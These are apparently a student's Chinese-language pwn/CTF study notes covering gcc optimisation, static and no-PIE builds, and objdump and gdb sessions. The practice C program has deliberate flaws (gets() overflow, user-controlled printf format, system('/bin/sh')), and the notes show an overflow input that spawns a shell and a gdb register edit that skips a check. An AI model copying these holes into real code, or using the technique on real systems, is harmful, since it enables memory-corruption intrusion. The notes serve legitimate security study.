gcc -o
gcc -O1/O2/O3
-O,-O1:这两个命令的效果是一样的,目的都是在不影响编译速度的前提下,尽量采用一些优化算法降低代码大小和可执行代码的运行速度。
-O2该优化选项会牺牲部分编译速度,除了执行-O1所执行的所有优化之外,还会采用几乎所有的目标配置支持的优化算法,用以提高目标代码的运行速度。
-O3该选项除了执行-O2所有的优化选项之外,一般都是采取很多向量化算法,提高代码的并行执行程度,利用现代CPU中的流水线,Cache等。
-Os这个优化标识和-O3有异曲同工之妙,当然两者的目标不一样,-O3的目标是宁愿增加目标代码的大小,也要拼命的提高运行速度,但是这个选项是在-O2的基础之上,尽量的降低目标代码的大小,这对于存储容量很小的设备来说非常重要。
Ofast:该选项将不会严格遵循语言标准,除了启用所有的-O3优化选项之外,也会针对某些语言启用部分优化。
-Og:该标识会精心挑选部分与-g选项不冲突的优化选项,当然就能提供合理的优化水平,同时产生较好的可调试信息和对语言标准的遵循程度
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_1$ gcc question_1.c -O3 -o question_1_x64_O3
question_1.c: In function ‘main’:
question_1.c:22:2: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(a);
^~~~
fgets
question_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]
printf(a);
^
question_1.c: In function ‘func’:
question_1.c:13:2: warning: ignoring return value of ‘system’, declared with attribute warn_unused_result [-Wunused-result]
system(cmd);
^~~~~~~~~~~
/tmp/ccysfJzi.o: In function `main':
question_1.c:(.text.startup+0x32): warning: the `gets' function is dangerous and should not be used.
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_1$ objdump -d question_1_x64_O3 -M intel |less
question_1_x64_O3: file format elf64-x86-64
Disassembly of section .init:
0000000000000708 <_init>:
708: 48 83 ec 08 sub rsp,0x8
70c: 48 8b 05 d5 08 20 00 mov rax,QWORD PTR [rip+0x2008d5] # 200fe8 <__gmon_start__>
713: 48 85 c0 test rax,rax
716: 74 02 je 71a <_init+0x12>
718: ff d0 call rax
71a: 48 83 c4 08 add rsp,0x8
71e: c3 ret
Disassembly of section .plt:
0000000000000720 <.plt>:
720: ff 35 72 08 20 00 push QWORD PTR [rip+0x200872] # 200f98 <_GLOBAL_OFFSET_TABLE_+0x8>
726: ff 25 74 08 20 00 jmp QWORD PTR [rip+0x200874] # 200fa0 <_GLOBAL_OFFSET_TABLE_+0x10>
72c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
0000000000000730 <puts@plt>:
730: ff 25 72 08 20 00 jmp QWORD PTR [rip+0x200872] # 200fa8 <puts@GLIBC_2.2.5>
736: 68 00 00 00 00 push 0x0
73b: e9 e0 ff ff ff jmp 720 <.plt>
0000000000000740 <__stack_chk_fail@plt>:
740: ff 25 6a 08 20 00 jmp QWORD PTR [rip+0x20086a] # 200fb0 <__stack_chk_fail@GLIBC_2.4>
746: 68 01 00 00 00 push 0x1
74b: e9 d0 ff ff ff jmp 720 <.plt>
0000000000000750 <system@plt>:
750: ff 25 62 08 20 00 jmp QWORD PTR [rip+0x200862] # 200fb8 <system@GLIBC_2.2.5>
756: 68 02 00 00 00 push 0x2
75b: e9 c0 ff ff ff jmp 720 <.plt>
0000000000000760 <gets@plt>:
760: ff 25 5a 08 20 00 jmp QWORD PTR [rip+0x20085a] # 200fc0 <gets@GLIBC_2.2.5>
766: 68 03 00 00 00 push 0x3
76b: e9 b0 ff ff ff jmp 720 <.plt>
0000000000000770 <__printf_chk@plt>:
770: ff 25 52 08 20 00 jmp QWORD PTR [rip+0x200852] # 200fc8 <__printf_chk@GLIBC_2.3.4>
776: 68 04 00 00 00 push 0x4
77b: e9 a0 ff ff ff jmp 720 <.plt>
0000000000000780 <setvbuf@plt>:
780: ff 25 4a 08 20 00 jmp QWORD PTR [rip+0x20084a] # 200fd0 <setvbuf@GLIBC_2.2.5>
786: 68 05 00 00 00 push 0x5
78b: e9 90 ff ff ff jmp 720 <.plt>
Disassembly of section .plt.got:
0000000000000790 <__cxa_finalize@plt>:
790: ff 25 62 08 20 00 jmp QWORD PTR [rip+0x200862] # 200ff8 <__cxa_finalize@GLIBC_2.2.5>
796: 66 90 xchg ax,ax
Disassembly of section .text:
00000000000007a0 <main>:
7a0: 53 push rbx
7a1: 48 8d 3d 5c 02 00 00 lea rdi,[rip+0x25c] # a04 <_IO_stdin_used+0x4>
7a8: 48 83 ec 10 sub rsp,0x10
7ac: 48 89 e3 mov rbx,rsp
7af: 48 c7 04 24 00 00 00 mov QWORD PTR [rsp],0x0
7b6: 00
7b7: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
7be: 00 00
7c0: 48 89 44 24 08 mov QWORD PTR [rsp+0x8],rax
7c5: 31 c0 xor eax,eax
7c7: e8 64 ff ff ff call 730 <puts@plt>
7cc: 48 89 df mov rdi,rbx
7cf: 31 c0 xor eax,eax
7d1: e8 8a ff ff ff call 760 <gets@plt>
7d6: 31 c0 xor eax,eax
7d8: 48 89 de mov rsi,rbx
7db: bf 01 00 00 00 mov edi,0x1
7e0: e8 8b ff ff ff call 770 <__printf_chk@plt>
7e5: 48 8b 54 24 08 mov rdx,QWORD PTR [rsp+0x8]
7ea: 64 48 33 14 25 28 00 xor rdx,QWORD PTR fs:0x28
7f1: 00 00
7f3: 75 08 jne 7fd <main+0x5d>
7f5: 48 83 c4 10 add rsp,0x10
7f9: 31 c0 xor eax,eax
7fb: 5b pop rbx
7fc: c3 ret
7fd: e8 3e ff ff ff call 740 <__stack_chk_fail@plt>
802: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
809: 00 00 00
80c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
0000000000000810 <_start>:
810: 31 ed xor ebp,ebp
812: 49 89 d1 mov r9,rdx
815: 5e pop rsi
816: 48 89 e2 mov rdx,rsp
819: 48 83 e4 f0 and rsp,0xfffffffffffffff0
81d: 50 push rax
81e: 54 push rsp
81f: 4c 8d 05 ca 01 00 00 lea r8,[rip+0x1ca] # 9f0 <__libc_csu_fini>
826: 48 8d 0d 53 01 00 00 lea rcx,[rip+0x153] # 980 <__libc_csu_init>
82d: 48 8d 3d 6c ff ff ff lea rdi,[rip+0xffffffffffffff6c] # 7a0 <main>
834: ff 15 a6 07 20 00 call QWORD PTR [rip+0x2007a6] # 200fe0 <__libc_start_main@GLIBC_2.2.5>
83a: f4 hlt
83b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
0000000000000840 <deregister_tm_clones>:
840: 48 8d 3d d1 07 20 00 lea rdi,[rip+0x2007d1] # 201018 <__TMC_END__>
847: 55 push rbp
848: 48 8d 05 c9 07 20 00 lea rax,[rip+0x2007c9] # 201018 <__TMC_END__>
84f: 48 39 f8 cmp rax,rdi
852: 48 89 e5 mov rbp,rsp
855: 74 19 je 870 <deregister_tm_clones+0x30>
857: 48 8b 05 7a 07 20 00 mov rax,QWORD PTR [rip+0x20077a] # 200fd8 <_ITM_deregisterTMCloneTable>
85e: 48 85 c0 test rax,rax
861: 74 0d je 870 <deregister_tm_clones+0x30>
863: 5d pop rbp
864: ff e0 jmp rax
866: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
86d: 00 00 00
870: 5d pop rbp
871: c3 ret
872: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
876: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
87d: 00 00 00
0000000000000880 <register_tm_clones>:
880: 48 8d 3d 91 07 20 00 lea rdi,[rip+0x200791] # 201018 <__TMC_END__>
887: 48 8d 35 8a 07 20 00 lea rsi,[rip+0x20078a] # 201018 <__TMC_END__>
88e: 55 push rbp
88f: 48 29 fe sub rsi,rdi
892: 48 89 e5 mov rbp,rsp
895: 48 c1 fe 03 sar rsi,0x3
899: 48 89 f0 mov rax,rsi
89c: 48 c1 e8 3f shr rax,0x3f
8a0: 48 01 c6 add rsi,rax
8a3: 48 d1 fe sar rsi,1
8a6: 74 18 je 8c0 <register_tm_clones+0x40>
8a8: 48 8b 05 41 07 20 00 mov rax,QWORD PTR [rip+0x200741] # 200ff0 <_ITM_registerTMCloneTable>
8af: 48 85 c0 test rax,rax
8b2: 74 0c je 8c0 <register_tm_clones+0x40>
8b4: 5d pop rbp
8b5: ff e0 jmp rax
8b7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
8be: 00 00
8c0: 5d pop rbp
8c1: c3 ret
8c2: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
8c6: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
8cd: 00 00 00
00000000000008d0 <__do_global_dtors_aux>:
8d0: 80 3d 71 07 20 00 00 cmp BYTE PTR [rip+0x200771],0x0 # 201048 <completed.7698>
8d7: 75 2f jne 908 <__do_global_dtors_aux+0x38>
8d9: 48 83 3d 17 07 20 00 cmp QWORD PTR [rip+0x200717],0x0 # 200ff8 <__cxa_finalize@GLIBC_2.2.5>
8e0: 00
8e1: 55 push rbp
8e2: 48 89 e5 mov rbp,rsp
8e5: 74 0c je 8f3 <__do_global_dtors_aux+0x23>
8e7: 48 8b 3d 1a 07 20 00 mov rdi,QWORD PTR [rip+0x20071a] # 201008 <__dso_handle>
8ee: e8 9d fe ff ff call 790 <__cxa_finalize@plt>
8f3: e8 48 ff ff ff call 840 <deregister_tm_clones>
8f8: c6 05 49 07 20 00 01 mov BYTE PTR [rip+0x200749],0x1 # 201048 <completed.7698>
8ff: 5d pop rbp
900: c3 ret
901: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
908: f3 c3 repz ret
90a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
0000000000000910 <frame_dummy>:
910: 55 push rbp
911: 48 89 e5 mov rbp,rsp
914: 5d pop rbp
915: e9 66 ff ff ff jmp 880 <register_tm_clones>
91a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
0000000000000920 <init_func>:
920: 48 83 ec 08 sub rsp,0x8
924: 48 8b 3d 05 07 20 00 mov rdi,QWORD PTR [rip+0x200705] # 201030 <stdin@@GLIBC_2.2.5>
92b: 31 c9 xor ecx,ecx
92d: ba 02 00 00 00 mov edx,0x2
932: 31 f6 xor esi,esi
934: e8 47 fe ff ff call 780 <setvbuf@plt>
939: 48 8b 3d e0 06 20 00 mov rdi,QWORD PTR [rip+0x2006e0] # 201020 <stdout@@GLIBC_2.2.5>
940: 31 c9 xor ecx,ecx
942: ba 02 00 00 00 mov edx,0x2
947: 31 f6 xor esi,esi
949: e8 32 fe ff ff call 780 <setvbuf@plt>
94e: 48 8b 3d eb 06 20 00 mov rdi,QWORD PTR [rip+0x2006eb] # 201040 <stderr@@GLIBC_2.2.5>
955: 31 c9 xor ecx,ecx
957: ba 02 00 00 00 mov edx,0x2
95c: 31 f6 xor esi,esi
95e: e8 1d fe ff ff call 780 <setvbuf@plt>
963: 31 c0 xor eax,eax
965: 48 83 c4 08 add rsp,0x8
969: c3 ret
96a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
0000000000000970 <func>:
970: 48 83 ec 08 sub rsp,0x8
974: e8 d7 fd ff ff call 750 <system@plt>
979: 31 c0 xor eax,eax
97b: 48 83 c4 08 add rsp,0x8
97f: c3 ret
0000000000000980 <__libc_csu_init>:
980: 41 57 push r15
982: 41 56 push r14
984: 49 89 d7 mov r15,rdx
987: 41 55 push r13
989: 41 54 push r12
98b: 4c 8d 25 fe 03 20 00 lea r12,[rip+0x2003fe] # 200d90 <__frame_dummy_init_array_entry>
992: 55 push rbp
993: 48 8d 2d fe 03 20 00 lea rbp,[rip+0x2003fe] # 200d98 <__init_array_end>
99a: 53 push rbx
99b: 41 89 fd mov r13d,edi
99e: 49 89 f6 mov r14,rsi
9a1: 4c 29 e5 sub rbp,r12
9a4: 48 83 ec 08 sub rsp,0x8
9a8: 48 c1 fd 03 sar rbp,0x3
9ac: e8 57 fd ff ff call 708 <_init>
9b1: 48 85 ed test rbp,rbp
9b4: 74 20 je 9d6 <__libc_csu_init+0x56>
9b6: 31 db xor ebx,ebx
9b8: 0f 1f 84 00 00 00 00 nop DWORD PTR [rax+rax*1+0x0]
9bf: 00
9c0: 4c 89 fa mov rdx,r15
9c3: 4c 89 f6 mov rsi,r14
9c6: 44 89 ef mov edi,r13d
9c9: 41 ff 14 dc call QWORD PTR [r12+rbx*8]
9cd: 48 83 c3 01 add rbx,0x1
9d1: 48 39 dd cmp rbp,rbx
9d4: 75 ea jne 9c0 <__libc_csu_init+0x40>
9d6: 48 83 c4 08 add rsp,0x8
9da: 5b pop rbx
9db: 5d pop rbp
9dc: 41 5c pop r12
9de: 41 5d pop r13
9e0: 41 5e pop r14
9e2: 41 5f pop r15
9e4: c3 ret
9e5: 90 nop
9e6: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
9ed: 00 00 00
00000000000009f0 <__libc_csu_fini>:
9f0: f3 c3 repz ret
Disassembly of section .fini:
00000000000009f4 <_fini>:
9f4: 48 83 ec 08 sub rsp,0x8
9f8: 48 83 c4 08 add rsp,0x8
9fc: c3 ret
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_1$ ./question_1_x64_O3
input:
aaaaaaaaaaaaaaa
*** stack smashing detected ***: <unknown> terminated
Abortedgcc -O3默认将不可能执行的内容直接删除了,所以无法执行shell
static
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ls
question_1.c
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ gcc question_1.c
question_1.c: In function ‘main’:
question_1.c:22:2: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(a);
^~~~
fgets
question_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]
printf(a);
^
/tmp/ccU59NVv.o: In function `main':
question_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ gcc question_1.c -static -o question_1_x64_static
question_1.c: In function ‘main’:
question_1.c:22:2: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(a);
^~~~
fgets
question_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]
printf(a);
^
/tmp/ccS7KXgP.o: In function `main':
question_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ls
a.out question_1.c question_1_x64_static
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ file a.out
a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=89a75bb48f86071b8e7a8066be9f400348d5e184, not stripped
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ file question_1_x64_static
question_1_x64_static: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=9d9740dc1b64a1dda55f20df2c02af26eaf10793, not stripped
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ldd a.out
linux-vdso.so.1 (0x00007ffeee7ed000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdaf2dcd000)
/lib64/ld-linux-x86-64.so.2 (0x00007fdaf33c0000)
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ldd question_1_x64_static
not a dynamic executable
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ll -h
total 844K
drwxrwxrwx 1 hack hack 4.0K Jun 14 13:31 ./
drwxrwxrwx 1 hack hack 4.0K Jun 10 17:53 ../
-rwxrwxrwx 1 hack hack 8.6K Jun 14 13:30 a.out*
-rwxrwxrwx 1 hack hack 409 Jun 10 17:53 question_1.c*
-rwxrwxrwx 1 hack hack 831K Jun 14 13:31 question_1_x64_static*hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ objdump -d question_1_x64_static -M intel |less
#只截取了main,和下面对比一下:
0000000000400bf1 <main>:
400bf1: 55 push rbp
400bf2: 48 89 e5 mov rbp,rsp
400bf5: 48 83 ec 20 sub rsp,0x20
400bf9: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
400c00: 00 00
400c02: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
400c06: 31 c0 xor eax,eax
400c08: 48 c7 45 e8 00 00 00 mov QWORD PTR [rbp-0x18],0x0
400c0f: 00
400c10: 48 c7 45 f0 00 00 00 mov QWORD PTR [rbp-0x10],0x0
400c17: 00
400c18: 48 8d 3d a5 21 09 00 lea rdi,[rip+0x921a5] # 492dc4 <_IO_stdin_used+0x4>
400c1f: e8 fc fd 00 00 call 410a20 <_IO_puts>
400c24: 48 8d 45 e8 lea rax,[rbp-0x18]
400c28: 48 89 c7 mov rdi,rax
400c2b: b8 00 00 00 00 mov eax,0x0
400c30: e8 3b fc 00 00 call 410870 <_IO_gets>
400c35: 48 8d 45 e8 lea rax,[rbp-0x18]
400c39: 48 89 c7 mov rdi,rax
400c3c: b8 00 00 00 00 mov eax,0x0
400c41: e8 aa ef 00 00 call 40fbf0 <_IO_printf>
400c46: 0f b6 45 f0 movzx eax,BYTE PTR [rbp-0x10]
400c4a: 3c 61 cmp al,0x61
400c4c: 75 0c jne 400c5a <main+0x69>
400c4e: 48 8d 3d 9b 94 2b 00 lea rdi,[rip+0x2b949b] # 6ba0f0 <sh>
400c55: e8 78 ff ff ff call 400bd2 <func>
400c5a: b8 00 00 00 00 mov eax,0x0
400c5f: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8]
400c63: 64 48 33 14 25 28 00 xor rdx,QWORD PTR fs:0x28
400c6a: 00 00
400c6c: 74 05 je 400c73 <main+0x82>
400c6e: e8 4d b2 04 00 call 44bec0 <__stack_chk_fail>
400c73: c9 leave
400c74: c3 ret
400c75: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
400c7c: 00 00 00
400c7f: 90 nop
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ objdump -d a.out -M intel |less
000000000000090e <main>:
90e: 55 push rbp
90f: 48 89 e5 mov rbp,rsp
912: 48 83 ec 20 sub rsp,0x20
916: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
91d: 00 00
91f: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
923: 31 c0 xor eax,eax
925: 48 c7 45 e8 00 00 00 mov QWORD PTR [rbp-0x18],0x0
92c: 00
92d: 48 c7 45 f0 00 00 00 mov QWORD PTR [rbp-0x10],0x0
934: 00
935: 48 8d 3d e8 00 00 00 lea rdi,[rip+0xe8] # a24 <_IO_stdin_used+0x4>
93c: e8 cf fd ff ff call 710 <puts@plt>
941: 48 8d 45 e8 lea rax,[rbp-0x18]
945: 48 89 c7 mov rdi,rax
948: b8 00 00 00 00 mov eax,0x0
94d: e8 fe fd ff ff call 750 <gets@plt>
952: 48 8d 45 e8 lea rax,[rbp-0x18]
956: 48 89 c7 mov rdi,rax
959: b8 00 00 00 00 mov eax,0x0
95e: e8 dd fd ff ff call 740 <printf@plt>
963: 0f b6 45 f0 movzx eax,BYTE PTR [rbp-0x10]
967: 3c 61 cmp al,0x61
969: 75 0c jne 977 <main+0x69>
96b: 48 8d 3d 9e 06 20 00 lea rdi,[rip+0x20069e] # 201010 <sh>
972: e8 78 ff ff ff call 8ef <func>
977: b8 00 00 00 00 mov eax,0x0
97c: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8]
980: 64 48 33 14 25 28 00 xor rdx,QWORD PTR fs:0x28
987: 00 00
989: 74 05 je 990 <main+0x82>
98b: e8 90 fd ff ff call 720 <__stack_chk_fail@plt>
990: c9 leave
991: c3 ret
992: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
999: 00 00 00
99c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]no-pie
基础知识
PIE(position-independent executable)是一种生成地址无关可执行程序的技术。如果编译器在生成可执行程序的过程中使用了PIE,那么当可执行程序被加载到内存中时其加载地址存在不可预知性。
详细可以看https://blog.csdn.net/weixin_33842304/article/details/91443399
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ gcc question_1.c -no-pie -o question_1_x64_nopie
question_1.c: In function ‘main’:
question_1.c:22:2: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(a);
^~~~
fgets
question_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]
printf(a);
^
/tmp/ccpFE2xY.o: In function `main':
question_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ ll
total 856
drwxrwxrwx 1 hack hack 4096 Jun 15 00:14 ./
drwxrwxrwx 1 hack hack 4096 Jun 10 17:53 ../
-rwxrwxrwx 1 hack hack 8760 Jun 14 13:30 a.out*
-rwxrwxrwx 1 hack hack 409 Jun 10 17:53 question_1.c*
-rwxrwxrwx 1 hack hack 8728 Jun 15 00:14 question_1_x64_nopie*
-rwxrwxrwx 1 hack hack 850080 Jun 14 13:31 question_1_x64_static*
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_4$ objdump -d question_1_x64_nopie -M intel |less
00000000004007bb <main>:
4007bb: 55 push rbp
4007bc: 48 89 e5 mov rbp,rsp
4007bf: 48 83 ec 20 sub rsp,0x20
4007c3: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
4007ca: 00 00
4007cc: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
4007d0: 31 c0 xor eax,eax
4007d2: 48 c7 45 e8 00 00 00 mov QWORD PTR [rbp-0x18],0x0
4007d9: 00
4007da: 48 c7 45 f0 00 00 00 mov QWORD PTR [rbp-0x10],0x0
4007e1: 00
4007e2: 48 8d 3d db 00 00 00 lea rdi,[rip+0xdb] # 4008c4 <_IO_stdin_used+0x4>
4007e9: e8 02 fe ff ff call 4005f0 <puts@plt>
4007ee: 48 8d 45 e8 lea rax,[rbp-0x18]
4007f2: 48 89 c7 mov rdi,rax
4007f5: b8 00 00 00 00 mov eax,0x0
4007fa: e8 31 fe ff ff call 400630 <gets@plt>
4007ff: 48 8d 45 e8 lea rax,[rbp-0x18]
400803: 48 89 c7 mov rdi,rax
400806: b8 00 00 00 00 mov eax,0x0
40080b: e8 10 fe ff ff call 400620 <printf@plt>
400810: 0f b6 45 f0 movzx eax,BYTE PTR [rbp-0x10]
400814: 3c 61 cmp al,0x61
400816: 75 0c jne 400824 <main+0x69>
400818: 48 8d 3d 39 08 20 00 lea rdi,[rip+0x200839] # 601058 <sh>
40081f: e8 78 ff ff ff call 40079c <func>
400824: b8 00 00 00 00 mov eax,0x0
400829: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8]
40082d: 64 48 33 14 25 28 00 xor rdx,QWORD PTR fs:0x28
400834: 00 00
400836: 74 05 je 40083d <main+0x82>
400838: e8 c3 fd ff ff call 400600 <__stack_chk_fail@plt>
40083d: c9 leave
40083e: c3 ret
40083f: 90 nop
作业
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_5$ ls
question_2.c question_2_x64
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_5$ cat question_2.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char sh[]="/bin/sh";
int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}
int func(char *cmd){
system(cmd);
return 0;
}
int main(){
init_func();
char a[8] = {};
char b[8] = {};
puts("input:");
gets(a);
printf(a);
if(!strcmp(b,"deadbeef")){
func(sh);
}
return 0;
}
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_5$ ./question_2_x64
input:
aaaaaaaadeadbeef
aaaaaaaadeadbeef$ whoami
hack
$ exithack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_5$ gdb ./question_2_x64
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./question_2_x64...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 3 at 0x555555555295
Starting program: /mnt/e/qqdownload/pwn/chapter_1/test_5/question_2_x64
Temporary breakpoint 3, 0x0000555555555295 in main ()
(gdb) disassemble $rip
Dump of assembler code for function main:
=> 0x0000555555555295 <+0>: endbr64
0x0000555555555299 <+4>: push rbp
0x000055555555529a <+5>: mov rbp,rsp
0x000055555555529d <+8>: sub rsp,0x20
0x00005555555552a1 <+12>: mov rax,QWORD PTR fs:0x28
0x00005555555552aa <+21>: mov QWORD PTR [rbp-0x8],rax
0x00005555555552ae <+25>: xor eax,eax
0x00005555555552b0 <+27>: mov eax,0x0
0x00005555555552b5 <+32>: call 0x555555555209 <init_func>
0x00005555555552ba <+37>: mov QWORD PTR [rbp-0x18],0x0
0x00005555555552c2 <+45>: mov QWORD PTR [rbp-0x10],0x0
0x00005555555552ca <+53>: lea rdi,[rip+0xd33] # 0x555555556004
0x00005555555552d1 <+60>: call 0x5555555550b0 <puts@plt>
0x00005555555552d6 <+65>: lea rax,[rbp-0x18]
0x00005555555552da <+69>: mov rdi,rax
0x00005555555552dd <+72>: mov eax,0x0
0x00005555555552e2 <+77>: call 0x555555555100 <gets@plt>
0x00005555555552e7 <+82>: lea rax,[rbp-0x18]
0x00005555555552eb <+86>: mov rdi,rax
0x00005555555552ee <+89>: mov eax,0x0
0x00005555555552f3 <+94>: call 0x5555555550e0 <printf@plt>
0x00005555555552f8 <+99>: lea rax,[rbp-0x10]
0x00005555555552fc <+103>: lea rsi,[rip+0xd08] # 0x55555555600b
0x0000555555555303 <+110>: mov rdi,rax
0x0000555555555306 <+113>: call 0x5555555550f0 <strcmp@plt>
0x000055555555530b <+118>: test eax,eax
0x000055555555530d <+120>: jne 0x55555555531b <main+134>
0x000055555555530f <+122>: lea rdi,[rip+0x2cfa] # 0x555555558010 <sh>
---Type <return> to continue, or q <return> to quit---
0x0000555555555316 <+129>: call 0x555555555272 <func>
0x000055555555531b <+134>: mov eax,0x0
0x0000555555555320 <+139>: mov rdx,QWORD PTR [rbp-0x8]
0x0000555555555324 <+143>: xor rdx,QWORD PTR fs:0x28
0x000055555555532d <+152>: je 0x555555555334 <main+159>
0x000055555555532f <+154>: call 0x5555555550c0 <__stack_chk_fail@plt>
0x0000555555555334 <+159>: leave
0x0000555555555335 <+160>: ret
End of assembler dump.
(gdb) b *0x000055555555530b
Breakpoint 4 at 0x55555555530b
(gdb) c
Continuing.
input:
aaaaaaa
aaaaaaa
Breakpoint 4, 0x000055555555530b in main ()
(gdb) x/10i $rip
=> 0x55555555530b <main+118>: test eax,eax
0x55555555530d <main+120>: jne 0x55555555531b <main+134>
0x55555555530f <main+122>: lea rdi,[rip+0x2cfa] # 0x555555558010 <sh>
0x555555555316 <main+129>: call 0x555555555272 <func>
0x55555555531b <main+134>: mov eax,0x0
0x555555555320 <main+139>: mov rdx,QWORD PTR [rbp-0x8]
0x555555555324 <main+143>: xor rdx,QWORD PTR fs:0x28
0x55555555532d <main+152>: je 0x555555555334 <main+159>
0x55555555532f <main+154>: call 0x5555555550c0 <__stack_chk_fail@plt>
0x555555555334 <main+159>: leave
(gdb) i r
rax 0xffffff9c 4294967196
rbx 0x0 0
rcx 0x0 0
rdx 0x64 100
rsi 0x55555555600b 93824992239627
rdi 0x7fffffffdb90 140737488346000
rbp 0x7fffffffdba0 0x7fffffffdba0
rsp 0x7fffffffdb80 0x7fffffffdb80
r8 0x7 7
r9 0x7ffff7fe94c0 140737354044608
r10 0x2 2
r11 0x246 582
r12 0x555555555120 93824992235808
r13 0x7fffffffdc80 140737488346240
r14 0x0 0
r15 0x0 0
rip 0x55555555530b 0x55555555530b <main+118>
eflags 0x297 [ CF PF AF SF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) set $eax=0x00
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x0 0
rdx 0x64 100
rsi 0x55555555600b 93824992239627
rdi 0x7fffffffdb90 140737488346000
rbp 0x7fffffffdba0 0x7fffffffdba0
rsp 0x7fffffffdb80 0x7fffffffdb80
r8 0x7 7
r9 0x7ffff7fe94c0 140737354044608
r10 0x2 2
r11 0x246 582
r12 0x555555555120 93824992235808
r13 0x7fffffffdc80 140737488346240
r14 0x0 0
r15 0x0 0
rip 0x55555555530b 0x55555555530b <main+118>
eflags 0x297 [ CF PF AF SF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
